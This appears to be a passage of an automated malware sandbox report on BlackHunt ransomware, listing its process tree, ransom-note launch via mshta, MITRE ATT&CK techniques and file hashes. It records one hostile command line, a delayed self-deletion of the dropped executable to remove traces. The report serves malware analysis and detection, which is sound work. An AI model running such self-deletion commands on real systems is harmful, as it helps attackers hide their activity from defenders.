C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:14868
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14868 -s 14444⤵
- Program crash
PID:15036
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe"2⤵PID:7672
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:15084
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Suspicious use of WriteProcessMemory
PID:864
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Suspicious use of WriteProcessMemory
PID:772
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3036
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:12828
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:12732
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:13156
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:1704
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 14868 -ip 148681⤵PID:14548
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD528ddb007ee70741a59c7d7a515fa4e7b
SHA1cdfd4179139240876f5d69ef13c4379b7cd24415
SHA2560cc9499d3c8a2404ff3998875bb2d9cbd3c68e83f036ff78cf70538b72d83fb9
SHA512a870509a2df3aae94ab307160b7553908ffaaad561f9b69d9571a4f2ac12319a58f19a223ba2829411d4781ffac517b935be66fd215b420f3d1aabde5998c802
-
Filesize
12KB
MD5d82bdb768f13c03c52f854fff905ab3e
SHA1d0b53ec05fd688d21d03a4c6bff5919bfd7d848f
SHA256250930be837799ba85efafc9777cd2c6b0f0a8863d51c885a6892ce29f593b4b
SHA5126b06d5e7dc311868244704ea36b9a53996f7b659cf82bdb0a7d25db08f3f6d7370a7b7eecf3252503a72ac9252fbc630173a97f5a500fea60673afbe17c07135
-
Filesize
684B
MD5c1d058dcede6c2a908bc20697e94bbe4
SHA17abf8ec783b21578830d3f0f300471935e51b90a
SHA256b99f152cb8921ad6699e37ab3c5126d476392e52acb88d712d0a75948e29e5c0
SHA512040c5f247abfdc49a5e602d6b9394ec2750ec8d806c3ee34486a54b8b41a34684e61b4b201f46e5243489e195d37f33897dfd1679f626127d9616daf8078513b